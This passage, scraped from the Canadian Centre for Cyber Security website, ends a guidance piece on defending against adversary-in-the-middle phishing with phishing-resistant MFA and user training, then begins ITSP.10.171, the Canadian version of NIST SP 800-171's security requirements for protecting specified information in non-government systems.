phishing-resistant multi-factor authentication</h2> <p>Although <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns are widespread, a solution already exists to mitigate all known campaigns: phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. This is the only way to completely stop these campaigns before a threat actor can get hold of an <abbr title="multi-factor authentication">MFA</abbr>-verified session.</p> <p>According to the Cyber Centre’s findings, full-session compromises within the Government of Canada and critical infrastructure partners have decreased over the last few years. This is primarily because these organizations have adopted registered device <abbr title="conditional access policies">CAPs</abbr> and other <abbr title="conditional access policies">CAPs</abbr> requiring phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and have implemented strictly controlled <abbr title="internet protocol">IP</abbr> restrictions on logins. Full-session compromises decreased from a high of almost 20% at the end of the third quarter of 2023 to less than 10% of all compromises as of early 2025.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 7: Cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results over time</figcaption><img alt="Figure 7 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig7-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 7: Cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results over time</summary><p>This bar graph illustrates the cumulative percentage of <abbr title="adversary-in-the-middle">AitM</abbr> phishing results that the Cyber Centre analyzed and categorized between 2023 and mid-2025.</p> <ul><li>2023 Q1: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 55.6%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 33.3%; full session compromise: 11.1%</li> <li>2023 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 55%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 35%; full session compromise: 10%</li> <li>2023 Q3: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 47.8%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 34.8%; full session compromise: 17.4%</li> <li>2023 Q4: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 50%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 33.3%; full session compromise: 16.7%</li> <li>2024 Q1: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 50%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 35.3%; full session compromise: 14.7%</li> <li>2024 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 51.2%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 34.9%; full session compromise: 14%</li> <li>2024 Q3: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 38.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 48.6%; full session compromise: 12.5%</li> <li>2024 Q4: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 38.4%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 51.5%; full session compromise: 10.1%</li> <li>2025 Q1: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 35.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 57%; full session compromise: 7%</li> <li>2025 Q2: Blocked: <abbr title="multi-factor authentication">MFA</abbr>/other <abbr title="conditional access policy">CAP</abbr>: 35.9%; blocked: registered device <abbr title="conditional access policy">CAP</abbr>: 58%; full session compromise: 6.1%</li> </ul></details></div> </div> <p>The Cyber Centre continues to observe a steady stream of <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns stemming from <abbr title="business email compromise">BEC</abbr>. This indicates that threat actors remain confident that enough accounts lack phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> protection, making <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns a worthwhile technique for compromising accounts.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info" id="6">Enhancing defences against evolving adversary-in-the-middle threats</h2> <p>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> can prevent <abbr title="adversary-in-the-middle">AitM</abbr> campaigns, but it can be difficult for organizations to implement. Cloud configuration can also be challenging, and most phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> methods are fee-based.</p> <p>Organizations should weigh the risk and impact of cyber incidents against the cost of implementing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. Organizations that choose to implement phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> should consider the following:</p> <ul><li>Compared with the cost of remediating and recovering from a data breach, providing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> methods (FIDO2 security keys, passkeys, Windows Hello for Business) to users is a cost-effective investment</li> <li>Data and information may be critical to business operations or contain highly sensitive private information, and any compromise can have a significant impact and cost for the organization</li> <li>An identity compromise can have a significant impact on an organization’s reputation</li> </ul><p>Some organizations are moving to devices that are registered with their <abbr title="information technology">IT</abbr> departments and phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. However, threat actors are often a step ahead and launch <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns before organizations can move to phishing-resistant options.</p> <h3 id="6.1">Addressing high-risk gaps and vulnerabilities</h3> <p>Organizations should deploy phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> to every user, without exception. They should also review their identity protection posture and flag any high-risk gaps or vulnerabilities. The following are examples of high-risk gaps or vulnerabilities that organizations should address immediately to prevent <abbr title="adversary-in-the-middle">AitM</abbr> compromises.</p> <h4>Administrators using weak <abbr title="multi-factor authentication">MFA</abbr> methods</h4> <p>Organizations should apply phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> to all administrator accounts, without exception, in any <abbr title="conditional access policy">CAP</abbr>. Additionally, organizations should remove any non-phishing-resistant backup methods on these accounts since these could be bypassed by <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <h4>Bring-your-own-device without phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> or location restrictions</h4> <p>Threat actors’ primary targets are users who are allowed to sign in from their own devices, outside of an organization’s controlled <abbr title="internet protocol">IP</abbr> space and without phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>. This is a very high-risk gap that organizations should address immediately.</p> <p>If organizations require users to use personal devices (known as bring your own device [BYOD]), they should deploy phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and ensure that users cannot use any weak fallback methods. Alternatively, organizations could require all BYOD logins to go through the organization’s corporate VPN, with an accompanying <abbr title="conditional access policy">CAP</abbr> that restricts logins to only that specific <abbr title="internet protocol">IP</abbr> space.</p> <p>The greatest challenge is avoiding the temptation to make exceptions for specific users, groups or applications. As a baseline, all users should have phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> by default and without exception.</p> <h3 id="6.2">Educating employees</h3> <p>Organizations should also train their employees on how to spot and report <abbr title="adversary-in-the-middle">AitM</abbr> campaigns. Many users will open emails and click on the included links if the email is from a trusted source. Organizations should consider including the following topics in their training on phishing campaigns.</p> <h4><abbr title="business email compromise">BEC</abbr> scenarios</h4> <p>The more users are aware of how common <abbr title="business email compromise">BEC</abbr> campaigns are, the more they will be on the lookout for them. Before clicking on a link in an email, they should know to ask themselves a couple of questions, such as:</p> <ul><li>Do I usually receive unsolicited Dropbox files from this contact?</li> <li>Does this contact usually send me SharePoint documents?</li> </ul><p>If a user receives unsolicited files, they should reach out to the sender through another method (for example, a phone call) to confirm that the document was shared intentionally.</p> <h4>Double-checking the URL when signing into login services</h4> <p>Verifying the legitimacy of URLs can be difficult since logins to some sites like Microsoft Entra ID contain long URLs, so users might not notice a suspicious domain in the path. Educating users on where to find the top-level domain within a URL and what domains to expect in that location can go a long way in stopping these campaigns.</p> <h4>Avoiding multiple logins</h4> <p>Users often sign into their accounts using a cloud-based identity and access management service like Microsoft Entra ID. This allows them to access applications like Microsoft SharePoint or Teams with a single sign-on. If users know that they shouldn’t need to log in again to access applications or a shared file, they will think twice before re-entering their credentials.</p> <p>Another helpful technique is to teach users to open a new tab and sign into the file-sharing service directly before clicking on a link. After logging into the service directly, users should not be prompted to sign in again when they click the file link in their email. If they do receive a prompt, it could be an <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaign.</p> <h4>Good password hygiene</h4> <p>Even if users know how to spot <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns, there will always be some successful campaigns that trick users into supplying their username and password before the campaigns are blocked by <abbr title="conditional access policies">CAPs</abbr>. This means that the threat actor can gain control of the user’s username and password, even if they did not get an <abbr title="multi-factor authentication">MFA</abbr>-verified session. Therefore, organizations must remind users to not reuse passwords. Once a threat actor obtains these credentials, they can use them against other login portals within the organization that might not have <abbr title="multi-factor authentication">MFA</abbr> protections (for example, legacy web portals or less secure VPN appliances).</p> </section><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info" id="7">Summary</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns are becoming more sophisticated and are occurring across all sectors. As this publication highlights, there are a number of measures organizations can take to mitigate this threat. However, the best defence against <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns is to implement phishing-resistant MFA by default and without exception.</p> <p>For additional cyber security guidance, please refer to the following:</p> <ul><li><a href="/en/guidance/foundational-cyber-security-actions-small-organizations-itsap10300">Foundational cyber security actions for small organizations (ITSAP.10.300)</a></li> <li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Offer tailored cyber security training to your employees (ITSAP.10.093)</a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030)</a></li> </ul></section></div> </div> </div> </div> </div> </article>

<article data-history-node-id="6144" about="/en/guidance/protecting-specified-information-non-government-canada-systems-and-organizations-itsp10171" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.10.171</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>October 2025 | Practitioner series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsp.10.171-e_1.pdf">Protecting specified information in non-Government of Canada systems and organizations – ITSP.10.171 (PDF, 2.5 MB)</a></p> </div> <h2 class="text-info">Foreword</h2> <p>This is an unclassified publication issued under the authority of the Head, Canadian Centre for Cyber Security (Cyber Centre). For more information or to suggest amendments, contact the Contact Centre:</p> <ul><li><a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li><a href="tel:+16139497048">(613) 949-7048</a> or <span class="nowrap"><a href="tel:+18332923788">1-833-CYBER-88</a></span></li> </ul><h2 class="text-info">Effective date</h2> <p>This publication takes effect on April 2, 2025.</p> <h2 class="text-info">Revision history</h2> <ol><li><strong>First release:</strong> April 2, 2025</li> <li><strong>Second release:</strong> October 28, 2025</li> </ol><section><h2 class="text-info">Table of contents</h2> <ul class="list-unstyled lst-spcd"><li><a href="#1">1 Introduction</a> <ul class="lst-none"><li><a href="#1-1">1.1 Purpose</a></li> <li><a href="#1-2">1.2 Audience</a></li> <li><a href="#1-3">1.3 Publication organization</a></li> </ul></li> <li><a href="#2">2 Fundamentals</a> <ul class="lst-none"><li><a href="#2-1">2.1 Security requirements assumptions</a></li> <li><a href="#2-2">2.2 Security requirement development methodology</a></li> </ul></li> <li><a href="#3">3 Requirements</a> <ul class="lst-none"><li><a href="#3-1">3.1 Access control</a></li> <li><a href="#3-2">3.2 Awareness and training</a></li> <li><a href="#3-3">3.3 Audit and accountability</a></li> <li><a href="#3-4">3.4 Configuration management</a></li> <li><a href="#3-5">3.5 Identification and authentication</a></li> <li><a href="#3-6">3.6 Incident response</a></li> <li><a href="#3-7">3.7 Maintenance</a></li> <li><a href="#3-8">3.8 Media protection</a></li> <li><a href="#3-9">3.9 Personnel security</a></li> <li><a href="#3-10">3.10 Physical protection</a></li> <li><a href="#3-11">3.11 Risk assessment</a></li> <li><a href="#3-12">3.12 Security assessment and monitoring</a></li> <li><a href="#3-13">3.13 System and communications protection</a></li> <li><a href="#3-14">3.14 System and information integrity</a></li> <li><a href="#3-15">3.15 Planning</a></li> <li><a href="#3-16">3.16 System and services acquisition</a></li> <li><a href="#3-17">3.17 Supply chain risk management</a></li> </ul></li> <li><a href="#AA">Annex A Tailoring criteria</a></li> <li><a href="#AB">Annex B Organization-defined parameters</a></li> </ul></section><section><h2 class="text-info">Overview</h2> <p>Protecting Specified Information is of paramount importance to Government of Canada (GC) departments and agencies and can directly impact the <abbr title="Government of Canada">GC</abbr>’s ability to successfully conduct its essential missions and functions. This publication provides <abbr title="Government of Canada">GC</abbr> departments and agencies with recommended security requirements for protecting the confidentiality of specified information when it resides in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. These requirements apply to the components of non-<abbr title="Government of Canada">GC</abbr> systems that handle, process, store or transmit <abbr title="controlled information">CI</abbr>, or that provide protection for such components. The security requirements are intended for use by <abbr title="Government of Canada">GC</abbr> departments and agencies in contractual vehicles or other agreements established between those departments and agencies and non-<abbr title="Government of Canada">GC</abbr> organizations.</p> <p>This publication is a Canadian version of the National Institute of Standards and Technology <a href="https://csrc.nist.gov/pubs/sp/800/171/r3/final">NIST SP 800-171 Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations</a>. The Cyber Centre will produce a companion publication to use in conjunction with this publication, based on <a href="https://csrc.nist.gov/pubs/sp/800/171/a/r3/final">NIST SP 800-171A Assessing Security Requirements for Controlled Unclassified Information</a>. That publication will provide a comprehensive set of procedures to assess the security requirements. In the interim, NIST SP 800-171A can be used as a reference.</p> <h2 class="text-info">Acknowledgments</h2> <p>The Cyber Centre wishes to acknowledge and thank Dr. Ron Ross and Victoria Pillitteri from the Computer Security Division at <abbr title="National Institute of Standards and Technology">NIST</abbr> for allowing the Cyber Security Guidance (CSG) team to use their guidance and modify it to the Canadian context.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="1">1 Introduction</h2> <p>This publication is a Canadian version of <a href="https://csrc.nist.gov/pubs/sp/800/171/r3/final">NIST SP 800-171 Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations</a>. There are no substantial technical changes between this publication and NIST SP 800-171. The primary modifications arise from differences in laws, policies, directives, standards and guidelines. In other words, the changes reflect the distinct Canadian regulatory and compliance landscape; there are no changes to the underlying technical context.</p> <p>The controls are aligned with Security and privacy controls and assurance activities catalogue (ITSP.10.033), which is a version of <a href="https://csrc.nist.gov/pubs/sp/800/53/r5/upd1/final">NIST SP 800-53 Rev. 5 Security and Privacy Controls for Information Systems and Organizations</a> adapted to the Canadian context.</p> <p><strong>Specified information</strong> includes any information, other than classified, that a GC authority identifies and qualifies in a contract as requiring safeguarding. Protected information, as well as the safeguarding and dissemination requirements for such information, is defined by the Treasury Board of Canada Secretariat <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=32614"><abbr title="Treasury Board Secretariat">TBS</abbr> Directive on Security Management, Appendix J: Standard on Security Categorization</a> and is codified in the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=12510"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Privacy Protection</a>. We use the term “specified information” in place of “controlled unclassified information” (CUI) which is used in the US document.</p> <p>GC departments and agencies are required to follow the policies and directives published by <abbr title="Treasury Board Secretariat">TBS</abbr> when using federal systems to handle, process, store, or transmit information<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>.</p> <p>The responsibility of <abbr title="Government of Canada">GC</abbr> departments and agencies to protect specified information remains the same when sharing it with non-<abbr title="Government of Canada">GC</abbr> organizations. Therefore, a similar level of protection is needed when non-<abbr title="Government of Canada">GC</abbr> organizations using non-<abbr title="Government of Canada">GC</abbr> systems handle, process, store or transmit specified information. To maintain a consistent level of protection, the security requirements for safeguarding specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations must comply with the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=16578"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Government Security</a>, <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=32603"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Service and Digital</a>, and <abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Privacy Protection.</p> <p>The security controls and activities presented in this publication outline requirements for federal contracting.</p> <p>This publication does not contain the complete set of privacy-related controls and activities described in ITSP.10.033. Rather, it contains a subset of privacy-related controls that are shared with confidentiality-related controls.</p> <h3 class="h2 mrgn-tp-lg" id="1-1">1.1 Purpose</h3> <p>This publication provides <abbr title="Government of Canada">GC</abbr> departments and agencies with recommended security requirements for protecting the confidentiality of specified information when in resides in non-<abbr title="Government of Canada">GC</abbr> systems and organizations and where there are no specific safeguarding requirements prescribed by the authorizing law, regulation, or government-wide policy for the specified information category.</p> <p>The security requirements in this publication are only applicable to components<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> of non-<abbr title="Government of Canada">GC</abbr> systems that handle, process, store, or transmit specified information <strong>or</strong> that provide protection for such components. The requirements are intended to be used by <abbr title="Government of Canada">GC</abbr> departments and agencies in contractual vehicles or other agreements established with non-<abbr title="Government of Canada">GC</abbr> organizations.</p> <p>It is important that non-<abbr title="Government of Canada">GC</abbr> organizations scope requirements appropriately when making protection-related investment decisions and managing security risks. By designating system components for handling, processing, storing or transmitting specified information, non-<abbr title="Government of Canada">GC</abbr> organizations can limit the scope of the security requirements by isolating the system components in a separate security domain. Isolation can be achieved by applying architectural and design concepts (e.g., implementing subnetworks with firewalls or other boundary protection devices and using information flow control mechanisms). Security domains can use physical separation, logical separation, or a combination of both. This approach can provide adequate security for specified information and avoid increasing the non-<abbr title="Government of Canada">GC</abbr> organization’s security posture beyond what it requires for protecting its missions, operations and assets.</p> <h3 class="h2 mrgn-tp-lg" id="1-2">1.2 Audience</h3> <p>This publication is intended for various individuals and organizations in the public and private sectors, including:</p> <ul><li><abbr title="Government of Canada">GC</abbr> departments and agencies responsible for managing and protecting specified information</li> <li>non-<abbr title="Government of Canada">GC</abbr> organizations responsible for protecting specified information</li> <li>individuals with system development lifecycle (SDLC) responsibilities</li> <li>individuals with acquisition or procurement responsibilities</li> <li>individuals with system, security, privacy or risk management and oversight responsibilities</li> <li>individuals with security or privacy assessment and monitoring responsibilities</li> </ul><h3 class="h2 mrgn-tp-lg" id="1-3">1.3 Publication organization</h3> <p>The remainder of this publication is organized as follows:</p> <ul><li><a href="#2">Section 2 Fundamentals</a> describes the assumptions and methodology used to develop the security requirements for protecting the confidentiality of specified information, the format of the requirements, and the tailoring criteria applied to the Cyber Centre guidelines to obtain the requirements</li> <li><a href="#3">Section 3 Requirements</a> lists the security requirements for protecting the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> </ul><p>The following sections provide additional information to support the protection of specified information:</p> <ul><li><a href="#AA">Annex A: Tailoring criteria</a></li> <li><a href="#AB">Annex B: Organization-defined parameters</a></li> </ul></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="2">2 Fundamentals</h2> <p>This section describes the assumptions and methodology used to develop the requirements to protect the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. It also includes the tailoring criteria applied to the controls in ITSP.10.033.</p> <h3 class="h2 mrgn-tp-lg" id="2-1">2.1 Security requirements assumptions</h3> <p>The security requirements in this publication are based on the following assumptions:</p> <ul><li><abbr title="Government of Canada">GC</abbr> information designated as specified information has the same value regardless of whether such information resides in a <abbr title="Government of Canada">GC</abbr> or a non-<abbr title="Government of Canada">GC</abbr> system or organization</li> <li>statutory and regulatory requirements for the protection of specified information are consistent in <abbr title="Government of Canada">GC</abbr> and non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> <li>safeguards implemented to protect specified information are consistent in <abbr title="Government of Canada">GC</abbr> and non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> <li>the confidentiality impact value for specified information is no less than low (Protected A), but will be medium for most large <abbr title="Government of Canada">GC</abbr> datasets</li> <li>non-<abbr title="Government of Canada">GC</abbr> organizations can directly implement a variety of potential security solutions or use external service providers to satisfy security requirements</li> </ul><h3 class="h2 mrgn-tp-lg" id="2-2">2.2 Security requirement development methodology</h3> <p>Starting with the ITSP.10.033 controls in the ITSP.10.033-01 Medium impact profile, the controls are tailored to eliminate selected controls or parts of controls that are:</p> <ul><li>primarily the responsibility of the <abbr title="Government of Canada">GC</abbr></li> <li>not directly related to protecting the confidentiality of specified information</li> <li>adequately addressed by other related controls</li> <li>not applicable</li> </ul><p>ITSP.10.171 security requirements represent a subset of the controls that are necessary to protect the confidentiality of specified information. The security requirements are organized into 17 families, as illustrated in Table 1. Each family contains the requirements related to its general security topic. Certain families from ITSP.10.033 are not included because they do not directly contribute to confidentiality. For example, the Personal information handling and transparency (PT) family is not included because it is about handling personal information (PI), not about the confidentiality of the <abbr title="personal information">PI</abbr>. The Program management (PM) family is not included because it is not related to confidentiality. Finally, the Contingency planning (CP) family is not included because it addresses availability.</p> <p>The following are the security requirements families:</p> <ul><li>Access control</li> <li>Awareness and training</li> <li>Audit and accountability</li> <li>Configuration management</li> <li>Identification and authentication</li> <li>Incident response</li> <li>Maintenance</li> <li>Media protection</li> <li>Personnel security</li> <li>Physical protection</li> <li>Risk assessment</li> <li>Security assessment and monitoring</li> <li>System and communications protection</li> <li>System and information integrity</li> <li>Planning</li> <li>System and services acquisition</li> <li>Supply chain risk management</li> </ul><p>Organization-defined parameters (ODPs) are included in certain security requirements. <abbr title="organization-defined parameter">ODP</abbr>s provide flexibility through the use of assignment and selection operations to allow <abbr title="Government of Canada">GC</abbr> departments and agencies and non-<abbr title="Government of Canada">GC</abbr> organizations to specify values for the designated parameters in the requirements. Assignment and selection operations allow security requirements to be customized based on specific protection needs. The determination of <abbr title="organization-defined parameter">ODP</abbr> values can be guided and informed by laws, Orders in Council, directives, regulations, policies, standards, guidance, or mission and business needs. Once specified, <abbr title="organization-defined parameter">ODP</abbr> values become part of the requirement. When present in a control or activity statement, the square brackets indicate that there is an <abbr title="organization-defined parameter">ODP</abbr> that needs to be inserted by the reader in order for an organization to tailor the control to their context.</p> <p><abbr title="organization-defined parameter">ODP</abbr>s are an important part of specifying a security requirement. <abbr title="organization-defined parameter">ODP</abbr>s provide both the flexibility and the specificity needed by organizations to clearly define their are an important part of specifying a security requirement security requirements according to their particular missions, business functions, operational environments and risk tolerance. In addition, <abbr title="organization-defined parameter">ODP</abbr>s support consistent security assessments to determine if specified security requirements have been satisfied. If a <abbr title="Government of Canada">GC</abbr> department or agency, or a group of departments or agencies, does not specify a particular value or range of values for an <abbr title="organization-defined parameter">ODP</abbr>, non-<abbr title="Government of Canada">GC</abbr> organizations must assign the value or values to complete the security requirement.</p> <p>Each requirement includes a discussion section, derived from the control discussion sections in NIST SP 800-53. These sections provide additional information to facilitate the implementation and assessment of the requirements. They are informative, not normative. The discussion sections are not intended to extend the scope of a requirement or to influence the solutions that organizations may use to satisfy a requirement. Examples provided are notional, not exhaustive, and do not reflect all the potential options available to organizations. The “References” section provides the source controls or assurance activities from ITSP.10.033, and a list of relevant publications with additional information on the topic described in the requirement.</p> <p>Because this is the first iteration of the Canadian publication, controls that were withdrawn in NIST SP 800-171 Revision 3 have been labelled as “not allocated” to keep the same numbering for interoperability purposes.</p> <p>The structure and content of a typical security requirement is provided in the example below.</p> <p>The term “organization” is used in many security requirements, and its meaning depends on context. For example, in a security requirement with an <abbr title="organization-defined parameter">ODP</abbr>, an organization can refer to either the <abbr title="Government of Canada">GC</abbr> department or agency or to the non-<abbr title="Government of Canada">GC</abbr> organization establishing the parameter values for the requirement.</p> <p>Annex A describes the security control tailoring criteria used to develop the security requirements and the results of the tailoring process. It provides a list of controls and activities from ITSP.10.033 that support the requirements and the controls and activities that have been eliminated from the Medium impact profile in accordance with the tailoring criteria.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="3">3 Requirements</h2> <p>This section describes 17 families of security requirements for protecting the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. In this section, the term “system” refers to non-<abbr title="Government of Canada">GC</abbr> systems or system components that handle, process, store or transmit specified information, or that provide protection for such systems or components. Not all security requirements mention specified information explicitly. Requirements that do not mention specified information explicitly are included because they directly affect the protection of specified information during its processing, storage or transmission.</p> <p>There may be limitations to how some systems, including specialized systems (e.g., industrial/process control systems, medical devices, or computer numerical control machines) can apply certain security requirements. To accommodate such issues, the system security plan — as reflected in requirement <a href="#03-15-02">System security plan 03.15.02</a> — is used to describe any enduring exceptions to the security requirements. Plans of action and milestones are used to manage individual, isolated or temporary deficiencies, as reflected in requirement <a href="#03-12-02">Plan of action and milestones 03.12.02</a>.</p> <p>The security requirements in this section are only applicable to components of non-<abbr title="Government of Canada">GC</abbr> systems that process, store or transmit specified information or that provide protection for such components.</p> <section><h3 class="h2 mrgn-tp-lg" id="3-1">3.1 Access control</h3> <p>The controls in the Access control family support the ability to permit or deny user access to resources within the system.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-01-01">03.01.01 Account management</a></li> <li><a href="#03-01-02">03.01.02 Access enforcement</a></li> <li><a href="#03-01-03">03.01.03 Information flow enforcement</a></li> <li><a href="#03-01-04">03.01.04 Separation of duties</a></li> <li><a href="#03-01-05">03.01.05 Least privilege</a></li> <li><a href="#03-01-06">03.01.06 Least privilege&nbsp;– privileged accounts</a></li> <li><a href="#03-01-07">03.01.07 Least privilege&nbsp;– privileged functions</a></li> <li><a href="#03-01-08">03.01.08 Unsuccessful logon attempts</a></li> <li><a href="#03-01-09">03.01.09 System use notification</a></li> <li><a href="#03-01-10">03.01.10 Device lock</a></li> <li><a href="#03-01-11">03.01.11 Session termination</a></li> <li><a href="#03-01-12">03.01.12 Remote access</a></li> <li><a href="#03-01-13">03.01.13 Not allocated</a></li> <li><a href="#03-01-14">03.01.14 Not allocated</a></li> <li><a href="#03-01-15">03.01.15 Not allocated</a></li> <li><a href="#03-01-16">03.01.16 Wireless access</a></li> <li><a href="#03-01-17">03.01.17 Not allocated</a></li> <li><a href="#03-01-18">03.01.18 Access control for mobile devices</a></li> <li><a href="#03-01-19">03.01.19 Not allocated</a></li> <li><a href="#03-01-20">03.01.20 Use of external systems</a></li> <li><a href="#03-01-21">03.01.21 Not allocated</a></li> <li><a href="#03-01-22">03.01.22 Publicly accessible content</a></li> </ul> </section>–> <details><summary><h4 id="03-01-01">03.01.01 Account management</h4> </summary><ol class="lst-upr-alph"><li>Define the types of system accounts allowed and prohibited.</li> <li>Create, enable, modify, disable, and remove system accounts in accordance with organizational policy, procedures, prerequisites, and criteria.</li> <li>Specify: <ol><li>authorized users of the system</li> <li>group and role membership</li> <li>access authorizations (i.e., privileges) for each account</li> </ol></li> <li>Authorize access to the system based on: <ol><li>a valid access authorization</li> <li>intended system usage</li> </ol></li> <li>Monitor the use of system accounts</li> <li>Disable system accounts when: <ol><li>the accounts have expired</li> <li>the accounts have been inactive for [Assignment: organization-defined time period]</li> <li>the accounts are no longer associated with a user or individual</li> <li>the accounts are in violation of organizational policy</li> <li>significant risks associated with individuals are discovered</li> </ol></li> <li>Notify account managers and designated personnel or roles within: <ol><li>[Assignment: organization-defined time period] when accounts are no longer required</li> <li>[Assignment: organization-defined time period] when users are terminated or transferred</li> <li>[Assignment: organization-defined time period] when system usage or the need-to-know changes for an individual</li> </ol></li> <li>Require that users log out of the system after [Assignment: organization-defined time period] of expected inactivity or when [Assignment: organization-defined circumstances].</li> </ol><h5>Discussion</h5> <p>This requirement focuses on account management for systems and applications. The definition and enforcement of access authorizations other than those determined by account type (e.g., privileged access or non-privileged access) are addressed in <a href="#03-01-02">Access enforcement 03.01.02</a>. System account types include individual, group, temporary, system, guest, anonymous, 